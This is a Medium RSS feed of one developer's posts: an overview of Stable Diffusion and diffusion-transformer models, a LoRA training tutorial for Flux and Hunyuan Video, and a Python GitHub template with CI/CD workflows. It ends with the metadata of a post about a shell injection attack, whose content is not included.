<?xml version="1.0" encoding="UTF-8"?><rss xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:atom="http://www.w3.org/2005/Atom" version="2.0" xmlns:cc="http://cyber.law.harvard.edu/rss/creativeCommonsRssModule.html">
    <channel>
        <title><![CDATA[Stories by 0517 jhj on Medium]]></title>
        <description><![CDATA[Stories by 0517 jhj on Medium]]></description>
        <link>https://medium.com/@developerjo0517?source=rss-d5fe4e536d4e------2</link>
        <image>
            <url>https://cdn-images-1.medium.com/fit/c/150/150/0*iLPl73yvozNiXBhn</url>
            <title>Stories by 0517 jhj on Medium</title>
            <link>https://medium.com/@developerjo0517?source=rss-d5fe4e536d4e------2</link>
        </image>
        <generator>Medium</generator>
        <lastBuildDate>Mon, 13 Apr 2026 08:02:11 GMT</lastBuildDate>
        <atom:link href="https://medium.com/@developerjo0517/feed" rel="self" type="application/rss+xml"/>
        <webMaster><![CDATA[yourfriends@medium.com]]></webMaster>
        <atom:link href="http://medium.superfeedr.com" rel="hub"/>
        <item>
            <title><![CDATA[Brief Overview of Stable Diffusion’s Development]]></title>
            <link>https://medium.com/@developerjo0517/brief-overview-of-stable-diffusions-development-07249d33bc91?source=rss-d5fe4e536d4e------2</link>
            <guid isPermaLink="false">https://medium.com/p/07249d33bc91</guid>
            <category><![CDATA[lora]]></category>
            <category><![CDATA[ai]]></category>
            <category><![CDATA[stable-diffusion]]></category>
            <category><![CDATA[image-generation]]></category>
            <dc:creator><![CDATA[0517 jhj]]></dc:creator>
            <pubDate>Mon, 03 Feb 2025 17:23:07 GMT</pubDate>
            <atom:updated>2025-02-03T17:26:12.887Z</atom:updated>
            <content:encoded><![CDATA[<p>There are so many great image generation models out there these days, like the many versions of Stable Diffusion and Flux. In this post, we’ll take a quick look at the different kinds of models used.</p><h3>Stable Diffusion (LDM)</h3><p><a href="https://stability.ai/news/stable-diffusion-announcement">Stability AI released its open-source Stable Diffusion model</a> in August 2022. This sparked widespread public interest in Gen AI, making image generation technology accessible to the general public.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/700/0*82l8BLpbaITnQ3H7.png" /><figcaption>Stable Diffusion Denoising Process from <a href="https://en.wikipedia.org/wiki/Stable_Diffusion">Wikipedia</a></figcaption></figure><p>Stable Diffusion’s core concept is based on a process of adding noise → then learning to reverse this process through denoising. The denoising UNET is the core component of a Latent Diffusion Model (LDM), responsible for the denoising process.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*IEDsp-C6-NBUllGz9m5Zqw.png" /><figcaption>Diagram from <a href="https://arxiv.org/abs/2112.10752">High-Resolution Image Synthesis with Latent Diffusion Models, April 2022</a></figcaption></figure><p>The image above illustrates how image generation works in the Latent Diffusion Model (LDM), the architecture behind Stability AI’s open-source Stable Diffusion model.</p><p>The denoising UNET works with images in a ‘latent space,’ a compact encoded representation of the image, which is initialized from a random seed at inference time. Once the UNET finishes denoising, this latent representation is decoded back into a regular image. 
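</p><p>The noise → denoise idea can be sketched in a few lines of numpy. This is a toy illustration of the underlying math only, not Stability AI’s actual code; the schedule values below are typical DDPM-style defaults.</p>

```python
import numpy as np

rng = np.random.default_rng(0)

# An illustrative DDPM-style noise schedule.
T = 1000
betas = np.linspace(1e-4, 0.02, T)
alphas_bar = np.cumprod(1.0 - betas)  # cumulative "signal fraction" per step

# A toy "latent" (SD 1.x latents are 4x64x64 for a 512px image).
x0 = rng.standard_normal((4, 64, 64))
t = 500
eps = rng.standard_normal(x0.shape)

# Forward (noising) process in closed form:
#   x_t = sqrt(abar_t) * x0 + sqrt(1 - abar_t) * eps
x_t = np.sqrt(alphas_bar[t]) * x0 + np.sqrt(1.0 - alphas_bar[t]) * eps

# The UNET is trained to predict eps from (x_t, t). If it predicted eps
# perfectly, the clean latent could be recovered exactly:
x0_hat = (x_t - np.sqrt(1.0 - alphas_bar[t]) * eps) / np.sqrt(alphas_bar[t])
print(np.allclose(x0, x0_hat))  # True
```

<p>In the real pipeline the predicted noise is only approximate, so sampling removes it gradually over many steps rather than in one shot.</p><p>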
A Variational AutoEncoder (VAE) is typically used in Stable Diffusion inference to handle the encoding and decoding of images to and from the latent space.</p><p>To incorporate text prompts, a text encoder (CLIP) tokenizes the text and embeds it into numerical values, which are then used during the UNET’s denoising process.</p><p><a href="https://stability.ai/">Stability AI</a> has led the open-source community for Stable Diffusion models. Here are some notable open-source releases based on the Latent Diffusion Model (LDM) architecture:</p><h4>SD 1.5</h4><ul><li><a href="https://huggingface.co/stable-diffusion-v1-5/stable-diffusion-v1-5">Released in October 2022 by RunwayML</a> (a mirror link is provided, as the official repo is no longer available).</li><li>Text-to-Image, Image-to-Image, and Inpainting, among other features.</li><li>Great ecosystem with many custom fine-tuned models and LoRAs.</li><li>Compatibility with ControlNet makes it a powerful tool for controlling image generation based on specific poses or concepts.</li></ul><h4>SD 2</h4><ul><li><a href="https://stability.ai/news/stable-diffusion-v2-release">Released in November 2022 by Stability AI</a></li><li>Supports 768x768 resolution, an upgrade from the 512x512 resolution of previous versions.</li><li>Retrained from scratch on a filtered dataset.</li></ul><h4>SDXL</h4><ul><li><a href="https://stability.ai/news/stable-diffusion-sdxl-1-announcement">Released in July 2023 by Stability AI</a></li><li>The largest SD model built on the UNET architecture.</li><li>Supports 1024x1024 resolution, an upgrade from previous versions.</li><li>Great ecosystem with many custom fine-tuned models and LoRAs.</li></ul><h3>Stable Diffusion (DiT)</h3><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*Da1a-athNfgIOCCIBsJcKQ.png" /><figcaption>DiT architecture from <a href="https://arxiv.org/abs/2212.09748">Scalable Diffusion Models with Transformers</a></figcaption></figure><p>The paper “<a 
href="https://arxiv.org/abs/2212.09748">Scalable Diffusion Models with Transformers</a>” (December 2022) introduced a new architecture for Stable Diffusion called DiT, which is now used in many SOTA image generation models.</p><p>DiT replaces Stable Diffusion’s traditional UNET with transformer blocks for denoising.</p><p>The core concept of Stable Diffusion remains the same: adding noise → learning to reverse this process through denoising. However, while the UNET handled this in the Latent Diffusion Model (LDM), transformer blocks take on this responsibility in DiT.</p><p>Because DiT leverages the transformer’s attention mechanism for denoising, it demands significantly more computing resources. However, this increased computational cost translates to more coherent and detailed outputs.</p><p>Here are some notable open-source releases based on the Diffusion Transformer (DiT) architecture:</p><h4>Flux</h4><ul><li><a href="https://blackforestlabs.ai/announcing-flux-1-1-pro-and-the-bfl-api/">Released in October 2024 by Black Forest Labs</a></li><li>Currently SOTA on the <a href="https://huggingface.co/spaces/ArtificialAnalysis/Text-to-Image-Leaderboard">Text-to-Image leaderboard</a></li><li>Great ecosystem with many custom fine-tuned models and LoRAs.</li></ul><h4>SD 3.5</h4><ul><li><a href="https://stability.ai/news/introducing-stable-diffusion-3-5">Released in October 2024 by Stability AI</a></li></ul><p>Currently, Flux stands out as the SOTA for text-to-image generation among open-source models 🎉:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/700/0*PHrCE9gZC5DycJIS.png" /><figcaption><a href="https://huggingface.co/spaces/ArtificialAnalysis/Text-to-Image-Leaderboard">Text-to-Image leaderboard</a></figcaption></figure><p>If you’re interested in training your own LoRAs for image generation models, check out this Jupyter Notebook project:</p><p><a href="https://github.com/jhj0517/finetuning-notebooks">GitHub - 
jhj0517/finetuning-notebooks</a></p><h3>Reference</h3><ul><li><a href="https://arxiv.org/abs/2112.10752">High-Resolution Image Synthesis with Latent Diffusion Models</a></li><li><a href="https://arxiv.org/abs/2212.09748">Scalable Diffusion Models with Transformers</a></li><li><a href="https://huggingface.co/spaces/ArtificialAnalysis/Text-to-Image-Leaderboard">Text-to-Image leaderboard</a></li></ul><img src="https://medium.com/_/stat?event=post.clientViewed&referrerSource=full_rss&postId=07249d33bc91" width="1" height="1" alt="">]]></content:encoded>
        </item>
        <item>
            <title><![CDATA[Train Your Own LoRA Models for Hunyuan Video and Flux in Google Colab]]></title>
            <link>https://medium.com/@developerjo0517/train-your-own-lora-models-for-hunyuan-video-and-flux-in-google-colab-3fc965e325d9?source=rss-d5fe4e536d4e------2</link>
            <guid isPermaLink="false">https://medium.com/p/3fc965e325d9</guid>
            <category><![CDATA[flux]]></category>
            <category><![CDATA[fine-tuning]]></category>
            <category><![CDATA[image-generation]]></category>
            <category><![CDATA[hunyuanvideo]]></category>
            <category><![CDATA[lora]]></category>
            <dc:creator><![CDATA[0517 jhj]]></dc:creator>
            <pubDate>Fri, 31 Jan 2025 13:11:05 GMT</pubDate>
            <atom:updated>2025-01-31T13:11:38.881Z</atom:updated>
            <content:encoded><![CDATA[<p>By January 2025, we have some pretty good models for generating images and videos: <a href="https://github.com/black-forest-labs/flux">Flux</a> for image generation, and <a href="https://github.com/Tencent/HunyuanVideo">Hunyuan Video</a> for video generation. Let’s take a quick look at what they do.</p><h3>Flux</h3><p>Flux is an open-source image generation model from <a href="https://blackforestlabs.ai/">Black Forest Labs</a>.</p><p>On the <a href="https://huggingface.co/spaces/ArtificialAnalysis/Text-to-Image-Leaderboard">Text-to-Image leaderboard</a>, Flux is the SOTA for image generation among open-source models.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/995/1*pyKVCwE78P8QKKQyiAfcmg.png" /></figure><p>A traditionally popular image generation model, <a href="https://aws.amazon.com/what-is/stable-diffusion/">Stable Diffusion</a>, uses a <a href="https://huggingface.co/docs/diffusers/main/api/models/unet2d">UNET</a> to generate images. The UNET is the core component of Stable Diffusion, responsible for taking noise → denoising it to produce the final image.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*bn4iQOlM2QpeBcLcSRdaTQ.png" /><figcaption>Stable Diffusion Denoising Process from <a href="https://en.wikipedia.org/wiki/Stable_Diffusion">Wikipedia</a></figcaption></figure><p>Unlike traditional Stable Diffusion, Flux uses a <a href="https://arxiv.org/abs/2212.09748">diffusion transformer</a> architecture for image generation, as mentioned in a Black Forest Labs blog post.</p><p>You can use natural language as a prompt in Flux. With many SD models, you might have to use a sequence of words separated by commas, like “woman, photo, smile, from front.” However, with Flux, you can use natural language, such as “A photo of a woman smiling and looking forward.” <br>In the Flux inference pipeline, this is achieved by loading two text encoders and using both of their embeddings. 
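</p><p>As a toy illustration of how two encoders’ embeddings can both condition a denoiser (hypothetical shapes and math, not the real Flux code): one encoder yields a pooled sentence vector used as a global modulation, while the other yields per-token states that the image tokens cross-attend over.</p>

```python
import numpy as np

rng = np.random.default_rng(0)

pooled = rng.standard_normal(768)         # sentence-level embedding (CLIP-style)
tokens = rng.standard_normal((12, 4096))  # per-token embeddings (T5-style)

hidden = rng.standard_normal((64, 4096))  # toy image-token states in the denoiser
proj = rng.standard_normal((768, 4096)) / np.sqrt(768)

# Global conditioning: project the pooled vector and add it to every image token.
modulated = hidden + pooled @ proj

# Cross-attention over the text token sequence (softmax over text tokens).
scores = modulated @ tokens.T                                 # (64, 12)
weights = np.exp(scores - scores.max(axis=-1, keepdims=True))
weights /= weights.sum(axis=-1, keepdims=True)
out = weights @ tokens                                        # (64, 4096)
print(out.shape)
```

<p>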
For more information on how Flux works, read the <a href="https://blackforestlabs.ai/announcing-black-forest-labs/">official blog post from Black Forest Labs</a>.</p><p>If you try to run the full Flux model without any quantization, you’ll likely need quite expensive hardware. But since you can now use the <a href="https://huggingface.co/city96/FLUX.1-dev-gguf/tree/main">GGUF format</a>, you can simply select the quantized version that best fits your hardware. For example, if you have an RTX 3060 12GB GPU, <a href="https://huggingface.co/city96/FLUX.1-dev-gguf/blob/main/flux1-dev-Q5_K_S.gguf">flux1-dev-Q5_K_S.gguf</a> would likely fit best.</p><p>The image below is a quality comparison between SD 3.5 and Flux from <a href="https://www.mimicpc.com/learn/flux-vs-sd3-5-which-model-is-better">mimicpc</a>:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*aTNplsRV7hzPzO7q9bomqg.jpeg" /><figcaption>SD 3.5 vs Flux comparison from <a href="https://www.mimicpc.com/learn/flux-vs-sd3-5-which-model-is-better">mimicpc</a></figcaption></figure><h3>Hunyuan Video</h3><p>Hunyuan Video is an open-source video generation model from <a href="https://www.tencent.com/en-us/">Tencent</a>.</p><p>I couldn’t find a proper text-to-video leaderboard on Hugging Face or elsewhere, so I can’t show you one. But here’s an example generation from <a href="https://replicate.com/tencent/hunyuan-video/examples">Replicate</a>:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/864/1*dR0jW0r1VRCR-I4j0555zA.gif" /><figcaption>Prompt : Dynamic shot racing alongside a steam locomotive on mountain tracks, camera panning from wheels to steam billowing against snow-capped peaks. Epic scale, dramatic lighting, photorealistic detail.</figcaption></figure><p>In my opinion, Hunyuan Video is a SOTA model among open-source text-to-video generation models. 
While Hunyuan Video does not yet support image-to-video, there are rumors that this feature may be released in Q1 2025.</p><p>Like many SOTA models today, Hunyuan Video also uses a transformer architecture, with a design of its own.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*YU9iqNF6cE8xF7qqkVcd3Q.png" /><figcaption>Dual-stream to Single-stream Design from <a href="https://github.com/Tencent/HunyuanVideo?tab=readme-ov-file#-hunyuanvideo-key-features">Hunyuan Video</a></figcaption></figure><p>Specifically, it uses a <strong>Dual-stream to Single-stream</strong> structure for video generation. In the Dual-stream phase, text and video tokens are processed independently in separate transformer blocks (one per stream). Later, in the Single-stream phase, they are concatenated and fed into subsequent transformer blocks. This design enables the model to learn its own appropriate modulation mechanisms without interference, resulting in better video generation quality.</p><p>And since video generation transformers utilize additional information across frames, Hunyuan Video uses a 3D VAE. The 3D VAE works with three dimensions: video length, space, and channels. Their compression ratios are set to 4, 8, and 16, respectively. The use of a 3D VAE significantly reduces the number of tokens for the subsequent diffusion transformer model. For more information on how it works, you can read <a href="https://arxiv.org/html/2412.03603v1">HunyuanVideo: A Systematic Framework For Large Video Generative Models</a>.</p><p>Just like Flux, even if you don’t have enough VRAM, you can still run Hunyuan Video models thanks to the <a href="https://huggingface.co/city96/HunyuanVideo-gguf/tree/main">GGUF format</a>. 
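</p><p>Choosing a quant can be sketched as a tiny, hypothetical helper. The file names and approximate sizes below come from the Flux GGUF repo mentioned earlier (the same idea applies to the Hunyuan Video GGUFs), and the 3 GB headroom for activations is a rough guess.</p>

```python
# Hypothetical helper: pick the largest GGUF quant that fits in VRAM.
# File names mirror city96/FLUX.1-dev-gguf; sizes (GB) are approximate.
QUANTS = [
    ("flux1-dev-Q8_0.gguf", 12.7),
    ("flux1-dev-Q6_K.gguf", 9.8),
    ("flux1-dev-Q5_K_S.gguf", 8.3),
    ("flux1-dev-Q4_K_S.gguf", 6.8),
    ("flux1-dev-Q3_K_S.gguf", 5.2),
]

def pick_quant(vram_gb: float, headroom_gb: float = 3.0) -> str:
    """Return the largest quant that fits, leaving headroom for activations."""
    for name, size_gb in QUANTS:  # ordered from highest quality down
        if size_gb + headroom_gb <= vram_gb:
            return name
    return QUANTS[-1][0]  # fall back to the smallest quant

print(pick_quant(12.0))  # RTX 3060 12GB -> flux1-dev-Q5_K_S.gguf
```

<p>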
Simply choose the quantized version that best suits your GPU.</p><h3>LoRA</h3><p><a href="https://hf.co/papers/2106.09685">LoRA (Low-Rank Adaptation of Large Language Models)</a> is a popular training technique for fine-tuning a model on a specific dataset. It works by inserting a small number of new weights into the model, and only these are trained. Since you only train a small number of parameters relative to the base model, you can fine-tune faster, more cheaply, and with greater memory efficiency.</p><p>Once you’ve trained the model using LoRA, you’ll have a smaller, adapted model derived from the base model. This smaller LoRA model can be attached to and detached from the base model in the inference pipeline to get your desired result. That’s what LoRA is designed for.</p><p>Because LoRA freezes the original weights of the base model and generates the desired result by inserting a small number of new weights, it offers flexibility and scalability. After training a solid base model, you would prefer to have several small LoRA models instead of retraining the entire base model.</p><p>Due to its cost-effectiveness, LoRA has become a very popular training technique.</p><h3>Preparing a Dataset for LoRA Training</h3><p>The datasets often contain images paired with corresponding text files for captioning.</p><p>Captioning is a widely used technique when training LoRA models, and there are some useful things to know about it. Let’s take a look by actually training an example LoRA model.</p><p>Here’s an example dataset, <a href="https://huggingface.co/datasets/diffusers/dog-example?row=4">diffusers/dog-example</a>:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*IrcTHOmuTkoyMEnM61imeQ.jpeg" /><figcaption><a href="https://huggingface.co/datasets/diffusers/dog-example?row=4">diffusers/dog-example</a></figcaption></figure><p>The dataset consists of 5 images of a puppy. 
The common feature among these images is that the puppy is sitting, rather than running or playing.</p><p>I want to train the model on the puppy itself, not on the concept of a “sitting puppy.” So how should I do that?</p><p>A key consideration when captioning images in a dataset is to emphasize features you want the model to learn distinctly. If there’s a specific feature you want to isolate, it’s recommended to caption it explicitly.</p><p>For example, let’s say you want to train a LoRA for a character that wears a hairpin. If you want the LoRA model to generate images of the character both with and without the hairpin, it’s recommended to include captions that specifically mention the hairpin. This principle also applies to other features, such as clothing, hairstyle, eye color, and so on.</p><p>Since I don’t want the LoRA to overfit to the concept of “sitting,” I should specifically caption the puppy’s seated pose.</p><p>To compare the results of using captions for the seated pose versus not using them, I prepared two different datasets.</p><ol><li><a href="https://huggingface.co/datasets/jhj0517/dog-example-without-sitting">dog-example-without-sitting</a></li></ol><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*h1oerCavmukzfHFezv4Hvw.jpeg" /><figcaption>Without “sitting” Captions</figcaption></figure><p>2. <a href="https://huggingface.co/datasets/jhj0517/dog-example-with-sitting">dog-example-with-sitting</a></p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*cKtiv6rOtE2panD96atc4A.jpeg" /><figcaption>With “sitting” Captions</figcaption></figure><p>They’re essentially the same dataset with the same images; I just made one with “sitting” in the captions and one without. I’ve temporarily named the puppy “A John’s dog” in the dataset. 
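</p><p>On disk, a caption dataset of this kind is typically just images with sibling .txt files. Here is a minimal sketch with placeholder files (the captions are illustrative examples in the spirit of the dataset above, not its actual contents):</p>

```python
from pathlib import Path
import tempfile

# Build a tiny stand-in dataset directory: image + sibling caption file.
root = Path(tempfile.mkdtemp()) / "dog-dataset"
root.mkdir(parents=True)

captions = {
    "dog_01.jpg": "A John's dog sitting on a stone step",
    "dog_02.jpg": "A John's dog sitting in front of a door",
}
for image_name, caption in captions.items():
    (root / image_name).touch()  # placeholder for the real image file
    (root / image_name).with_suffix(".txt").write_text(caption)

print(sorted(p.name for p in root.iterdir()))
# ['dog_01.jpg', 'dog_01.txt', 'dog_02.jpg', 'dog_02.txt']
```

<p>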
Since this word is used repeatedly in the captions, it will become the “trigger word” for the LoRA model.</p><p>After training each LoRA model for 1000 steps, here are some example results generated using these LoRA models with the prompt, “A John’s dog is playing with a ball in the grass.”:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*yDu0Q8Kz7d_vj35ON7qYIA.jpeg" /></figure><p>The image on the left was generated using the LoRA model without the “sitting” keyword, while the image on the right used the LoRA model with the “sitting” keyword.</p><p>To me, the right image appears less overfit to the concept of “sitting.”</p><p>The seed used was 77. You can regenerate the results or conduct further tests using these LoRA models from here:</p><ul><li><a href="https://huggingface.co/jhj0517/A-John_s-dog/blob/main/README.md">https://huggingface.co/jhj0517/A-John_s-dog</a></li></ul><p>A better example would involve a dataset with a character wearing a hairpin, hat, or some other distinctive clothing, if I could find one.</p><h3>Training LoRA with Colab</h3><p>To train LoRA models for use with Hunyuan and Flux, I recommend checking out <a href="https://github.com/ostris/ai-toolkit">ostris/ai-toolkit</a> and <a href="https://github.com/tdrussell/diffusion-pipe">tdrussell/diffusion-pipe</a>. They are great projects for fine-tuning vision generation models.</p><p>For convenience, I’ve created Jupyter Notebooks that are compatible with Google Colab.</p><p><a href="https://colab.google/">Colab</a> is Google’s Jupyter notebook hosting service, where you can rent some of Google’s computing resources to run Jupyter notebooks. 
There are a few advantages to using Colab:</p><ul><li>Free GPU runtime with up to 16 GB of VRAM (T4 GPU)</li><li>Supports form fields within notebooks, which is very helpful for users who are not comfortable with coding.</li></ul><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*F8Duh7HpSHQproi04h4gdw.gif" /><figcaption>Form Fields</figcaption></figure><p>In my opinion, Colab is a good way to showcase your projects to those who are not interested in reading the code.</p><p>Once you have prepared the dataset, it would be nice to be able to train LoRA models by simply running the cells in order, which is achievable with Jupyter Notebooks.</p><p>If you’re interested in LoRA training with notebooks, please visit:</p><p><a href="https://github.com/jhj0517/finetuning-notebooks">GitHub - jhj0517/finetuning-notebooks</a></p><h3>Reference</h3><ul><li><a href="https://github.com/black-forest-labs/flux">https://github.com/black-forest-labs/flux</a></li><li><a href="https://en.wikipedia.org/wiki/Stable_Diffusion">https://en.wikipedia.org/wiki/Stable_Diffusion</a></li><li><a href="https://www.mimicpc.com/learn/flux-vs-sd3-5-which-model-is-better">https://www.mimicpc.com/learn/flux-vs-sd3-5-which-model-is-better</a></li><li><a href="https://github.com/Tencent/HunyuanVideo">https://github.com/Tencent/HunyuanVideo</a></li><li><a href="https://replicate.com/tencent/hunyuan-video/examples">https://replicate.com/tencent/hunyuan-video/examples</a></li><li><a href="https://huggingface.co/docs/diffusers/en/training/lora">https://huggingface.co/docs/diffusers/en/training/lora</a></li><li><a href="https://github.com/tdrussell/diffusion-pipe">https://github.com/tdrussell/diffusion-pipe</a></li><li><a href="https://github.com/ostris/ai-toolkit">https://github.com/ostris/ai-toolkit</a></li><li><a href="https://huggingface.co/datasets/diffusers/dog-example?row=4">https://huggingface.co/datasets/diffusers/dog-example?row=4</a></li></ul><img 
src="https://medium.com/_/stat?event=post.clientViewed&referrerSource=full_rss&postId=3fc965e325d9" width="1" height="1" alt="">]]></content:encoded>
        </item>
        <item>
            <title><![CDATA[Python Project Template with Basic CI/CD Pipeline on Github]]></title>
            <link>https://medium.com/@developerjo0517/python-project-template-with-basic-ci-cd-pipeline-on-github-b1954a9d8f7e?source=rss-d5fe4e536d4e------2</link>
            <guid isPermaLink="false">https://medium.com/p/b1954a9d8f7e</guid>
            <category><![CDATA[python]]></category>
            <category><![CDATA[github-actions]]></category>
            <category><![CDATA[github]]></category>
            <category><![CDATA[template]]></category>
            <dc:creator><![CDATA[0517 jhj]]></dc:creator>
            <pubDate>Fri, 27 Dec 2024 11:46:28 GMT</pubDate>
            <atom:updated>2024-12-27T13:03:27.095Z</atom:updated>
            <content:encoded><![CDATA[<p>When you start a new project with your team, it’s good to have a solid template format for your project. For example, a typical CI/CD pipeline workflow or coding convention documentation for your team’s work. Of course, since it’s just a template to start with, you can edit and add what you want as the project scales.</p><p>Creating a <a href="https://docs.github.com/en/repositories/creating-and-managing-repositories/creating-a-template-repository">GitHub Template Repository</a> is a good way to achieve this; it lets you start a new project without repeating the same setup work. For example, if your team uses GitHub as a project management tool, it’s cumbersome to create issue and PR templates every time you start a new project. So I’ve created a basic Python template that anyone can use. We’ll look at its basic components in this post.</p><h4>GitHub Actions</h4><p>Here are some basic CI/CD pipelines worth having on GitHub when starting a Python project.</p><ol><li><strong>CI with </strong><strong>pytest</strong></li></ol><iframe src="" width="0" height="0" frameborder="0" scrolling="no"><a href="https://medium.com/media/a3d4063ba9baebc47cd2bc39112da36f/href">https://medium.com/media/a3d4063ba9baebc47cd2bc39112da36f/href</a></iframe><p>Typically, you would have a tests/ directory in your project. An automated CI pipeline that runs python -m pytest tests every time a commit or PR lands on the master branch makes for a better development experience.</p><blockquote>Note: I added a “Clean up space for action” step because the free GitHub Actions runner has a disk space limitation. I’ve run into out-of-disk-space errors when installing heavy packages (e.g. torch), and this step resolves those cases.</blockquote><p><strong>2. 
CD for DockerHub ( Optional )</strong></p><iframe src="" width="0" height="0" frameborder="0" scrolling="no"><a href="https://medium.com/media/61f98dbb3394f909c706276e002738dd/href">https://medium.com/media/61f98dbb3394f909c706276e002738dd/href</a></iframe><p>This is optional, for when you have a Dockerfile in your project. The action automates building the Docker image and pushing it to Docker Hub. Automating the build-and-push process is a great convenience. I’ve set the auto-trigger on commits to the master branch, but you can update it in other ways, for example triggering on a release in your repository.</p><p>Since it needs Docker Hub credentials to push the image, you need to register secrets in your repository. You can register secrets as environment variables in the “Settings — Secrets and variables — Actions” tab.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*p1_bxmPznO1hZa0W358uZA.png" /><figcaption>Github Action Secrets</figcaption></figure><p><strong>3. CD for PyPI Package ( Optional )</strong></p><iframe src="" width="0" height="0" frameborder="0" scrolling="no"><a href="https://medium.com/media/77f7257320d8cedbea57adad42717eca/href">https://medium.com/media/77f7257320d8cedbea57adad42717eca/href</a></iframe><p>This is also optional, only if your project is a PyPI package. Whenever you create a release on your repository, it will automatically build and push it to PyPI as a package. All you have to do is edit <a href="https://github.com/jhj0517/python-project-template/blob/master/pyproject.toml">pyproject.toml</a> and <a href="https://github.com/jhj0517/python-project-template/blob/master/setup.py">setup.py</a> as your project needs. 
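</p><p>For reference, a minimal pyproject.toml for a setuptools-based package might look like this (hypothetical values; adapt the names and versions to your project):</p>

```toml
[build-system]
requires = ["setuptools>=61.0"]
build-backend = "setuptools.build_meta"

[project]
name = "my-package"                 # hypothetical package name
version = "0.1.0"
description = "Short description of your package"
requires-python = ">=3.9"
dependencies = []
```

<p>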
The auto-triggering of all optional workflows is disabled by default, so you can enable it only when you need it.</p><h4>Issues &amp; PR templates</h4><p>You would have your own issue &amp; PR templates for your project. If you have to make them every time you start a new project, it would definitely be cumbersome.</p><p>You can create issue templates by placing markdown files in the <a href="https://github.com/jhj0517/python-project-template/tree/master/.github/ISSUE_TEMPLATE">.github/ISSUE_TEMPLATE</a> directory. Typically you would have “bug report” and “feature request” as base issue templates. Here are the example markdown files:</p><pre>---<br>name: Bug report<br>about: Create a report to help us improve<br>title: &#39;&#39;<br>labels: bug<br>assignees: &#39;&#39;<br>---<br><br>**Which OS are you using?**<br> - OS: [e.g. Linux or Windows]</pre><pre>---<br>name: Feature request<br>about: Any feature you want<br>title: &#39;&#39;<br>labels: enhancement<br>assignees: &#39;&#39;<br>---<br><br>**Describe feature you want**</pre><p>You can create a template for PRs as well by placing a <a href="https://github.com/jhj0517/python-project-template/blob/master/.github/pull_request_template.md">.github/pull_request_template.md</a> file. Here is the example PR template file:</p><pre>## Related issues / PRs. Summarize issues.<br>- #<br><br>## Summarize Changes<br>1. </pre><p>Of course, you can edit or add to them as needed for your project.</p><h4>Directory Structure</h4><p>The final directory structure would look like this. Directories marked (optional) can be removed if you don’t need them.</p><pre>python-project-template/    <br>├── .github/                # GA workflows &amp; PR, Issue templates<br>├── docker/                 # (optional) Dockerfile &amp; docker-compose files related to the project.  
<br>├── tests/                  # Test code with pytest<br>├── .gitignore              # gitignore file <br>├── README.md               # README file<br>├── pyproject.toml          # (optional) PyPI package configuration file<br>├── setup.py                # (optional) PyPI package setup file<br>└── requirements.txt        # Project dependencies </pre><h4>Quick Start</h4><p>Once you have created the repository, you can enable it to be used as a template. Go to the “Settings — General” tab and check the “Template repository” checkbox.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*u6Vqo1595nJux4VE-HP8Ow.png" /><figcaption>“Template repository” Checkbox</figcaption></figure><p>Then the “Use this template” button will appear, and you can use it as a template now.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*0I7_TfC9S31O-R-kWVW_ng.png" /><figcaption>Click “Create a new repository” Button to use the Template.</figcaption></figure><p>I’ve created a template repository that anyone can use, with a basic CI/CD pipeline and files. You can edit, remove, or add anything as your project needs. If you’re interested, please visit:</p><p><a href="https://github.com/jhj0517/python-project-template">GitHub - jhj0517/python-project-template: Template repository for python project</a></p><h4>Reference</h4><ul><li><a href="https://docs.github.com/en/repositories/creating-and-managing-repositories/creating-a-template-repository">https://docs.github.com/en/repositories/creating-and-managing-repositories/creating-a-template-repository</a></li><li><a href="https://github.com/bmcfee/pyrubberband/blob/main/.github/workflows/publish.yml">https://github.com/bmcfee/pyrubberband/blob/main/.github/workflows/publish.yml</a></li></ul><img src="https://medium.com/_/stat?event=post.clientViewed&referrerSource=full_rss&postId=b1954a9d8f7e" width="1" height="1" alt="">]]></content:encoded>
        </item>
        <item>
            <title><![CDATA[Shell Injection Attack on Open Source Project with +33k Stars on Github]]></title>
            <link>https://medium.com/@developerjo0517/how-the-hacker-attacked-open-source-project-that-has-33k-stars-on-github-c84338b639c7?source=rss-d5fe4e536d4e------2</link>
            <guid isPermaLink="false">https://medium.com/p/c84338b639c7</guid>
            <category><![CDATA[ai]]></category>
            <category><![CDATA[hacking]]></category>
            <category><![CDATA[python]]></category>
            <category><![CDATA[yolo]]></category>
            <category><![CDATA[ultralytics]]></category>
            <dc:creator><![CDATA[0517 jhj]]></dc:creator>
            <pubDate>Fri, 06 Dec 2024 20:34:16 GMT</pubDate>
            <atom:updated>2024-12-26T13:13:13.680Z</atom:updated>
